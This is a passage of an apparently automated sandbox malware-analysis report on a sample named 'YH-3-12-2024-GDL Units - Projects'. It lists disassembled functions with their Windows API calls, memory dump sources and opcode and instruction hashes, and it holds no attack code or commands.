                                                        • Associated: 00000000.00000002.1668153652.000000000084F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1668153652.0000000000874000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1668184050.000000000087E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1668196241.0000000000887000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_7c0000_YH-3-12-2024-GDL Units - Projects.jbxd
                                                        Similarity
                                                        • API ID: MessagePostSleep$RectWindow
                                                        • String ID:
                                                        • API String ID: 3382505437-0
                                                        • Opcode ID: 6b0f1e824c005419c0cd331344f6e09143775623fb34212bdbb23ce1b78f5a12
                                                        • Instruction ID: 4141c1e5d66a048e557e8c92b44cd78cf610cb134aa926580d0b7cb9350947a1
                                                        • Opcode Fuzzy Hash: 6b0f1e824c005419c0cd331344f6e09143775623fb34212bdbb23ce1b78f5a12
                                                        • Instruction Fuzzy Hash: 4631DF71500229EFDB14CFA8D94DADE3BB9FF05315F10822AF925E61D1C7B09950CB91
                                                        Function 0081B1EC Relevance: 7.6, APIs: 5, Instructions: 88windowCOMMON
                                                        Download Yara Rule
                                                        APIs
                                                        • IsWindowVisible.USER32(?), ref: 0081B204
                                                        • SendMessageW.USER32(?,0000000E,00000000,00000000), ref: 0081B221
                                                        • SendMessageW.USER32(?,0000000D,00000001,00000000), ref: 0081B259
                                                        • CharUpperBuffW.USER32(00000000,00000000,?,?,?,?), ref: 0081B27F
                                                        • _wcsstr.LIBCMT ref: 0081B289
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1668117068.00000000007C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 007C0000, based on PE: true
                                                        • Associated: 00000000.00000002.1668106518.00000000007C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1668153652.000000000084F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1668153652.0000000000874000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1668184050.000000000087E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1668196241.0000000000887000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_7c0000_YH-3-12-2024-GDL Units - Projects.jbxd
                                                        Similarity
                                                        • API ID: MessageSend$BuffCharUpperVisibleWindow_wcsstr
                                                        • String ID:
                                                        • API String ID: 3902887630-0
                                                        • Opcode ID: 37b1ce131ff5abe87c88a69b623013cc714bb3f87ac0a5d330af74f6e39c27a4
                                                        • Instruction ID: 798fd4367f4cb0e3b0838abad3048a8a79854fd557ca5de7de3a4a1451d6cdff
                                                        • Opcode Fuzzy Hash: 37b1ce131ff5abe87c88a69b623013cc714bb3f87ac0a5d330af74f6e39c27a4
                                                        • Instruction Fuzzy Hash: DF21F571205244BAEB259B759C09EBF7B9CEF4A750F00413DF804DA1A2EBB5DC80D6A0
                                                        Function 0084B14B Relevance: 7.6, APIs: 5, Instructions: 85COMMON
                                                        Download Yara Rule
                                                        APIs
                                                          • Part of subcall function 007C2612: GetWindowLongW.USER32(?,000000EB), ref: 007C2623
                                                        • GetWindowLongW.USER32(?,000000F0), ref: 0084B192
                                                        • SetWindowLongW.USER32(00000000,000000F0,00000001), ref: 0084B1B7
                                                        • SetWindowLongW.USER32(00000000,000000EC,000000FF), ref: 0084B1CF
                                                        • GetSystemMetrics.USER32(00000004), ref: 0084B1F8
                                                        • SetWindowPos.USER32(00000000,00000000,00000000,00000000,00000000,00000000,00000047,?,?,?,?,?,?,?,00830E90,00000000), ref: 0084B216
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1668117068.00000000007C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 007C0000, based on PE: true
                                                        • Associated: 00000000.00000002.1668106518.00000000007C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1668153652.000000000084F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1668153652.0000000000874000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1668184050.000000000087E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1668196241.0000000000887000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_7c0000_YH-3-12-2024-GDL Units - Projects.jbxd
                                                        Similarity
                                                        • API ID: Window$Long$MetricsSystem
                                                        • String ID:
                                                        • API String ID: 2294984445-0
                                                        • Opcode ID: 3488242fb1cf746da9e92e48ee95780c46944b9adafb38a1c9922c60f829a3fc
                                                        • Instruction ID: feb8a8c6d53b919c8dc71e3d627461453386a1229782bd12487912edf1cacedb
                                                        • Opcode Fuzzy Hash: 3488242fb1cf746da9e92e48ee95780c46944b9adafb38a1c9922c60f829a3fc
                                                        • Instruction Fuzzy Hash: 92218171A10669AFCB109F78DC14A6A7BA4FB06365F154739FA32D71E0E730D821DB90
                                                        Function 00819307 Relevance: 7.6, APIs: 5, Instructions: 84windowCOMMON
                                                        Download Yara Rule
                                                        APIs
                                                        • SendMessageW.USER32(?,00001004,00000000,00000000), ref: 00819320
                                                          • Part of subcall function 007C7BCC: _memmove.LIBCMT ref: 007C7C06
                                                        • SendMessageW.USER32(?,0000102C,00000000,00000002), ref: 00819352
                                                        • __itow.LIBCMT ref: 0081936A
                                                        • SendMessageW.USER32(?,0000102C,00000000,00000002), ref: 00819392
                                                        • __itow.LIBCMT ref: 008193A3
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1668117068.00000000007C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 007C0000, based on PE: true
                                                        • Associated: 00000000.00000002.1668106518.00000000007C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1668153652.000000000084F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1668153652.0000000000874000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1668184050.000000000087E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1668196241.0000000000887000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_7c0000_YH-3-12-2024-GDL Units - Projects.jbxd
                                                        Similarity
                                                        • API ID: MessageSend$__itow$_memmove
                                                        • String ID:
                                                        • API String ID: 2983881199-0
                                                        • Opcode ID: 3f216fd6be1b0d6e8a9cd77f6d658acf1d9a1d892623a771663bdaf50ddef6a3
                                                        • Instruction ID: adec30e5a699e34a353bed90dc88086bd6c2874cb2a8f33460e657cf348171ff
                                                        • Opcode Fuzzy Hash: 3f216fd6be1b0d6e8a9cd77f6d658acf1d9a1d892623a771663bdaf50ddef6a3
                                                        • Instruction Fuzzy Hash: 1821F531701208ABDB109A648C99EEE7BACFF59720F045029FA98D73C1DAB08D81C791
                                                        Function 00835A4D Relevance: 7.6, APIs: 5, Instructions: 70COMMON
                                                        Download Yara Rule
                                                        APIs
                                                        • IsWindow.USER32(00000000), ref: 00835A6E
                                                        • GetForegroundWindow.USER32 ref: 00835A85
                                                        • GetDC.USER32(00000000), ref: 00835AC1
                                                        • GetPixel.GDI32(00000000,?,00000003), ref: 00835ACD
                                                        • ReleaseDC.USER32(00000000,00000003), ref: 00835B08
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1668117068.00000000007C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 007C0000, based on PE: true
                                                        • Associated: 00000000.00000002.1668106518.00000000007C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1668153652.000000000084F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1668153652.0000000000874000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1668184050.000000000087E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1668196241.0000000000887000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_7c0000_YH-3-12-2024-GDL Units - Projects.jbxd
                                                        Similarity
                                                        • API ID: Window$ForegroundPixelRelease
                                                        • String ID:
                                                        • API String ID: 4156661090-0
                                                        • Opcode ID: f43742da7646034d1a0ff61aa2811d6b85dcb22acca85fe6c1378d4e42a73f82
                                                        • Instruction ID: 8b210fbf71dc4961481b1f0fc7d085983eed32bff21b8b0c8be04826324cc8a9
                                                        • Opcode Fuzzy Hash: f43742da7646034d1a0ff61aa2811d6b85dcb22acca85fe6c1378d4e42a73f82
                                                        • Instruction Fuzzy Hash: 2A216F75A00214EFDB14EF69D888A9ABBE5FF89310F15847DF909D7362CA34AD40DB90
                                                        Function 007C12F3 Relevance: 7.6, APIs: 5, Instructions: 67COMMON
                                                        Download Yara Rule
                                                        APIs
                                                        • ExtCreatePen.GDI32(?,?,00000000,00000000,00000000,?,00000000), ref: 007C134D
                                                        • SelectObject.GDI32(?,00000000), ref: 007C135C
                                                        • BeginPath.GDI32(?), ref: 007C1373
                                                        • SelectObject.GDI32(?,00000000), ref: 007C139C
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1668117068.00000000007C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 007C0000, based on PE: true
                                                        • Associated: 00000000.00000002.1668106518.00000000007C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1668153652.000000000084F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1668153652.0000000000874000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1668184050.000000000087E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1668196241.0000000000887000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_7c0000_YH-3-12-2024-GDL Units - Projects.jbxd
                                                        Similarity
                                                        • API ID: ObjectSelect$BeginCreatePath
                                                        • String ID:
                                                        • API String ID: 3225163088-0
                                                        • Opcode ID: b0dd6a9ddae039b5b6fb5b7d3f3c66968b83ede66615112ecee29718d824aca1
                                                        • Instruction ID: 2f7d22c2034985fa315c1d2e61ab0457522d7dc5704e7e4a66d3dca942d5457b
                                                        • Opcode Fuzzy Hash: b0dd6a9ddae039b5b6fb5b7d3f3c66968b83ede66615112ecee29718d824aca1
                                                        • Instruction Fuzzy Hash: 02217F30800A48EFDB118F69DC08B6A7BE8FB02725F54423FF810965B2D7789891DF90
                                                        Function 0081BC9E Relevance: 7.6, APIs: 5, Instructions: 61COMMON
                                                        Download Yara Rule
                                                        APIs
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1668117068.00000000007C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 007C0000, based on PE: true
                                                        • Associated: 00000000.00000002.1668106518.00000000007C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1668153652.000000000084F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1668153652.0000000000874000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1668184050.000000000087E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1668196241.0000000000887000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_7c0000_YH-3-12-2024-GDL Units - Projects.jbxd
                                                        Similarity
                                                        • API ID: _memcmp
                                                        • String ID:
                                                        • API String ID: 2931989736-0
                                                        • Opcode ID: 9c3e76c0d3330143bdda30802ffc0ed2d0b0669b3edc472fb3718d8e40a986e5
                                                        • Instruction ID: 2e626c9d56cdc02d0903d623e4884f7011f24289a51bf35feff23a56376bab09
                                                        • Opcode Fuzzy Hash: 9c3e76c0d3330143bdda30802ffc0ed2d0b0669b3edc472fb3718d8e40a986e5
                                                        • Instruction Fuzzy Hash: 0F019EB260114DBBD2046B12AD42FFBB35CFF66398B044025FD15DA382EF69EE5482E1
                                                        Function 00824A93 Relevance: 7.6, APIs: 5, Instructions: 56synchronizationthreadwindowCOMMON
                                                        Download Yara Rule
                                                        APIs
                                                        • GetCurrentThreadId.KERNEL32 ref: 00824ABA
                                                        • __beginthreadex.LIBCMT ref: 00824AD8
                                                        • MessageBoxW.USER32(?,?,?,?), ref: 00824AED
                                                        • WaitForSingleObject.KERNEL32(00000000,000000FF,?,?,?,?), ref: 00824B03
                                                        • CloseHandle.KERNEL32(00000000,?,?,?,?), ref: 00824B0A
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1668117068.00000000007C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 007C0000, based on PE: true
                                                        • Associated: 00000000.00000002.1668106518.00000000007C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1668153652.000000000084F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1668153652.0000000000874000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1668184050.000000000087E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1668196241.0000000000887000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_7c0000_YH-3-12-2024-GDL Units - Projects.jbxd
                                                        Similarity
                                                        • API ID: CloseCurrentHandleMessageObjectSingleThreadWait__beginthreadex
                                                        • String ID:
                                                        • API String ID: 3824534824-0
                                                        • Opcode ID: 606d15a03fd1b1168b67c3f9e11814b13c4eba579d5622af8dd39409b531cf91
                                                        • Instruction ID: ea0849e8f3330d84cb9282e63350d734435b5d580536dc46489ad114a2113eeb
                                                        • Opcode Fuzzy Hash: 606d15a03fd1b1168b67c3f9e11814b13c4eba579d5622af8dd39409b531cf91
                                                        • Instruction Fuzzy Hash: 1811047A905668FBC7018FACAC08A9B7FACFB45320F144269F924D3251DB75C944CBB1
                                                        Function 00818202 Relevance: 7.5, APIs: 5, Instructions: 49memoryCOMMON
                                                        Download Yara Rule
                                                        APIs
                                                        • GetUserObjectSecurity.USER32(?,00000004,?,00000000,?), ref: 0081821E
                                                        • GetLastError.KERNEL32(?,00817CE2,?,?,?), ref: 00818228
                                                        • GetProcessHeap.KERNEL32(00000008,?,?,00817CE2,?,?,?), ref: 00818237
                                                        • HeapAlloc.KERNEL32(00000000,?,00817CE2,?,?,?), ref: 0081823E
                                                        • GetUserObjectSecurity.USER32(?,00000004,00000000,?,?), ref: 00818255
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1668117068.00000000007C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 007C0000, based on PE: true
                                                        • Associated: 00000000.00000002.1668106518.00000000007C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1668153652.000000000084F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1668153652.0000000000874000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1668184050.000000000087E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1668196241.0000000000887000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_7c0000_YH-3-12-2024-GDL Units - Projects.jbxd
                                                        Similarity
                                                        • API ID: HeapObjectSecurityUser$AllocErrorLastProcess
                                                        • String ID:
                                                        • API String ID: 842720411-0
                                                        • Opcode ID: 1dbca632727dc704fe1f76196e25cb9c790b5aecb4aee7a834ee06af8c397cbe
                                                        • Instruction ID: 01d77674e2e39eba746a1530af1925bd0d61faf33993e3cc680df14ce049a1ea
                                                        • Opcode Fuzzy Hash: 1dbca632727dc704fe1f76196e25cb9c790b5aecb4aee7a834ee06af8c397cbe
                                                        • Instruction Fuzzy Hash: 05016975200204FFDB214FA6EC49DAB7BACFF9B755B60042DFE09C2220DA318C40CA60
                                                        Function 0081710A Relevance: 7.5, APIs: 5, Instructions: 48stringCOMMON
                                                        Download Yara Rule
                                                        APIs
                                                        • CLSIDFromProgID.OLE32(?,?,00000000,?,00000000,?,?,-C0000018,00000001,?,00817044,80070057,?,?,?,00817455), ref: 00817127
                                                        • ProgIDFromCLSID.OLE32(?,00000000,?,?,00000000,?,00000000,?,?,-C0000018,00000001,?,00817044,80070057,?,?), ref: 00817142
                                                        • lstrcmpiW.KERNEL32(?,00000000,?,?,00000000,?,00000000,?,?,-C0000018,00000001,?,00817044,80070057,?,?), ref: 00817150
                                                        • CoTaskMemFree.OLE32(00000000,?,00000000,?,?,00000000,?,00000000,?,?,-C0000018,00000001,?,00817044,80070057,?), ref: 00817160
                                                        • CLSIDFromString.OLE32(?,?,?,?,00000000,?,00000000,?,?,-C0000018,00000001,?,00817044,80070057,?,?), ref: 0081716C
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1668117068.00000000007C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 007C0000, based on PE: true
                                                        • Associated: 00000000.00000002.1668106518.00000000007C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1668153652.000000000084F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1668153652.0000000000874000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1668184050.000000000087E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1668196241.0000000000887000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_7c0000_YH-3-12-2024-GDL Units - Projects.jbxd
                                                        Similarity
                                                        • API ID: From$Prog$FreeStringTasklstrcmpi
                                                        • String ID:
                                                        • API String ID: 3897988419-0
                                                        • Opcode ID: 2b81866662fdb1447acdf7f51a4b8e90f9ce6e102107a1cbc23dfe09de8861b8
                                                        • Instruction ID: 4ef840d8555021a5017c99d4635798a8da509010a5bff2bc9cc0498db929a3d0
                                                        • Opcode Fuzzy Hash: 2b81866662fdb1447acdf7f51a4b8e90f9ce6e102107a1cbc23dfe09de8861b8
                                                        • Instruction Fuzzy Hash: CB015E76601208BBDB114F64DC44AAA7BBDFF49751F14006DFE05D6211D771DD81D7A0
                                                        Function 00825244 Relevance: 7.5, APIs: 5, Instructions: 48sleepCOMMON
                                                        Download Yara Rule
                                                        APIs
                                                        • QueryPerformanceCounter.KERNEL32(?,00000000,?,?,?,?,?,?,?,?,?,?), ref: 00825260
                                                        • QueryPerformanceFrequency.KERNEL32(?,?,?,?,?,?,?,?,?,?,?), ref: 0082526E
                                                        • Sleep.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?), ref: 00825276
                                                        • QueryPerformanceCounter.KERNEL32(?,?,?,?,?,?,?,?,?,?,?), ref: 00825280
                                                        • Sleep.KERNEL32(?,00000000,?,?,?,?,?,?,?,?,?,?), ref: 008252BC
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1668117068.00000000007C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 007C0000, based on PE: true
                                                        • Associated: 00000000.00000002.1668106518.00000000007C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1668153652.000000000084F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1668153652.0000000000874000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1668184050.000000000087E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1668196241.0000000000887000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_7c0000_YH-3-12-2024-GDL Units - Projects.jbxd
                                                        Similarity
                                                        • API ID: PerformanceQuery$CounterSleep$Frequency
                                                        • String ID:
                                                        • API String ID: 2833360925-0
                                                        • Opcode ID: 4c8b75c8047b26fe1b49af790a9775a4de5ca6a39709d4b7872e3f5b574091a0
                                                        • Instruction ID: e3f62603d057d25e4b1cc9c5e6e4ef5bc0ec4023710b02c54485001b0473145e
                                                        • Opcode Fuzzy Hash: 4c8b75c8047b26fe1b49af790a9775a4de5ca6a39709d4b7872e3f5b574091a0
                                                        • Instruction Fuzzy Hash: 8B011775D41A2DDBCF00EFE4E849AEDBB78FB0A711F41015AEA41F2281CB709590C7A1
                                                        Function 0081810A Relevance: 7.5, APIs: 5, Instructions: 45memoryCOMMON
                                                        Download Yara Rule
                                                        APIs
                                                        • GetTokenInformation.ADVAPI32(?,00000003(TokenIntegrityLevel),?,00000000,?), ref: 00818121
                                                        • GetLastError.KERNEL32(?,TokenIntegrityLevel,?,00000000,?), ref: 0081812B
                                                        • GetProcessHeap.KERNEL32(00000008,?,?,TokenIntegrityLevel,?,00000000,?), ref: 0081813A
                                                        • HeapAlloc.KERNEL32(00000000,?,TokenIntegrityLevel,?,00000000,?), ref: 00818141
                                                        • GetTokenInformation.ADVAPI32(?,00000003(TokenIntegrityLevel),00000000,?,?,?,TokenIntegrityLevel,?,00000000,?), ref: 00818157
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1668117068.00000000007C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 007C0000, based on PE: true
                                                        • Associated: 00000000.00000002.1668106518.00000000007C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1668153652.000000000084F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1668153652.0000000000874000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1668184050.000000000087E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1668196241.0000000000887000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_7c0000_YH-3-12-2024-GDL Units - Projects.jbxd
                                                        Similarity
                                                        • API ID: HeapInformationToken$AllocErrorLastProcess
                                                        • String ID:
                                                        • API String ID: 44706859-0
                                                        • Opcode ID: 2b4f0a63cf1e492c1c9952b03451bf2b036ebe203aab2db0ca770428cf5d6da5
                                                        • Instruction ID: e97fb2c4d6be0b7e5b6b61764bf486aaa53a334906c41559fbc6d35ceae9da1b
                                                        • Opcode Fuzzy Hash: 2b4f0a63cf1e492c1c9952b03451bf2b036ebe203aab2db0ca770428cf5d6da5
                                                        • Instruction Fuzzy Hash: 3EF06275240304FFEB220FA5ECC9EA73BADFF8A754F100029FA45C6151CBA19D41DA60
                                                        Function 0081C1E3 Relevance: 7.5, APIs: 5, Instructions: 41windowtimeCOMMON
                                                        Download Yara Rule
                                                        APIs
                                                        • GetDlgItem.USER32(?,000003E9), ref: 0081C1F7
                                                        • GetWindowTextW.USER32(00000000,?,00000100), ref: 0081C20E
                                                        • MessageBeep.USER32(00000000), ref: 0081C226
                                                        • KillTimer.USER32(?,0000040A), ref: 0081C242
                                                        • EndDialog.USER32(?,00000001), ref: 0081C25C
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1668117068.00000000007C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 007C0000, based on PE: true
                                                        • Associated: 00000000.00000002.1668106518.00000000007C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1668153652.000000000084F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1668153652.0000000000874000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1668184050.000000000087E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1668196241.0000000000887000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_7c0000_YH-3-12-2024-GDL Units - Projects.jbxd
                                                        Similarity
                                                        • API ID: BeepDialogItemKillMessageTextTimerWindow
                                                        • String ID:
                                                        • API String ID: 3741023627-0
                                                        • Opcode ID: c265095a23f0540892533e7067f44e021f987d1f4337a2a875510655e8c47234
                                                        • Instruction ID: c8d84f304923e9ce68ff91d3ab3da6db79c1a6f8dbbd527a8d3c8078d9f2897c
                                                        • Opcode Fuzzy Hash: c265095a23f0540892533e7067f44e021f987d1f4337a2a875510655e8c47234
                                                        • Instruction Fuzzy Hash: 6C01A234444308ABEB205B64ED4EF9677BCFF11B06F00026DB646E14E1DBF46984CB90
                                                        Function 007C13B0 Relevance: 7.5, APIs: 5, Instructions: 29COMMON
                                                        Download Yara Rule
                                                        APIs
                                                        • EndPath.GDI32(?), ref: 007C13BF
                                                        • StrokeAndFillPath.GDI32(?,?,007FB888,00000000,?), ref: 007C13DB
                                                        • SelectObject.GDI32(?,00000000), ref: 007C13EE
                                                        • DeleteObject.GDI32 ref: 007C1401
                                                        • StrokePath.GDI32(?), ref: 007C141C
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1668117068.00000000007C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 007C0000, based on PE: true
                                                        • Associated: 00000000.00000002.1668106518.00000000007C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1668153652.000000000084F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1668153652.0000000000874000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1668184050.000000000087E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1668196241.0000000000887000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_7c0000_YH-3-12-2024-GDL Units - Projects.jbxd
                                                        Similarity
                                                        • API ID: Path$ObjectStroke$DeleteFillSelect
                                                        • String ID:
                                                        • API String ID: 2625713937-0
                                                        • Opcode ID: 6a50493070e3f9eda785030bcf0964af9c8e4a3ad791385ed3d802c3f0a33c0f
                                                        • Instruction ID: 2b9eaba9e8add2dbd7eaec7731738a9da91aded473395f94d56d2863eecf4802
                                                        • Opcode Fuzzy Hash: 6a50493070e3f9eda785030bcf0964af9c8e4a3ad791385ed3d802c3f0a33c0f
                                                        • Instruction Fuzzy Hash: 4FF0C934004A88EBDB255F6AEC4CB593FE4BB42326F58823EE529490F2C7355995DF50
                                                        Function 007D2CFB Relevance: 7.3, APIs: 3, Strings: 1, Instructions: 265COMMON
                                                        Download Yara Rule
                                                        APIs
                                                          • Part of subcall function 007E0DB6: std::exception::exception.LIBCMT ref: 007E0DEC
                                                          • Part of subcall function 007E0DB6: __CxxThrowException@8.LIBCMT ref: 007E0E01
                                                          • Part of subcall function 007C7DE1: _memmove.LIBCMT ref: 007C7E22
                                                          • Part of subcall function 007C7A51: _memmove.LIBCMT ref: 007C7AAB
                                                        • __swprintf.LIBCMT ref: 007D2ECD
                                                        Strings
                                                        • \\[\\nrt]|%%|%[-+ 0#]?([0-9]*|\*)?(\.[0-9]*|\.\*)?[hlL]?[diouxXeEfgGs], xrefs: 007D2D66
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1668117068.00000000007C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 007C0000, based on PE: true
                                                        • Associated: 00000000.00000002.1668106518.00000000007C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1668153652.000000000084F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1668153652.0000000000874000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1668184050.000000000087E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1668196241.0000000000887000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_7c0000_YH-3-12-2024-GDL Units - Projects.jbxd
                                                        Similarity
                                                        • API ID: _memmove$Exception@8Throw__swprintfstd::exception::exception
                                                        • String ID: \\[\\nrt]|%%|%[-+ 0#]?([0-9]*|\*)?(\.[0-9]*|\.\*)?[hlL]?[diouxXeEfgGs]
                                                        • API String ID: 1943609520-557222456
                                                        • Opcode ID: 597fa695c4a88d35b8d8683d54afb183d243b114d333146f47c33b6c484d7f27
                                                        • Instruction ID: f7e02ffaf5184ba17e0c38d7b4495c2223cbb91bf90f58c709310cc2c3a9bc96
                                                        • Opcode Fuzzy Hash: 597fa695c4a88d35b8d8683d54afb183d243b114d333146f47c33b6c484d7f27
                                                        • Instruction Fuzzy Hash: D4916A71108201DFC718EF24C899D6EB7B4FF99710F04491EF4459B2A2EA78ED56CB92
                                                        Function 0082B93B Relevance: 7.3, APIs: 3, Strings: 1, Instructions: 261comCOMMON
                                                        Download Yara Rule
                                                        APIs
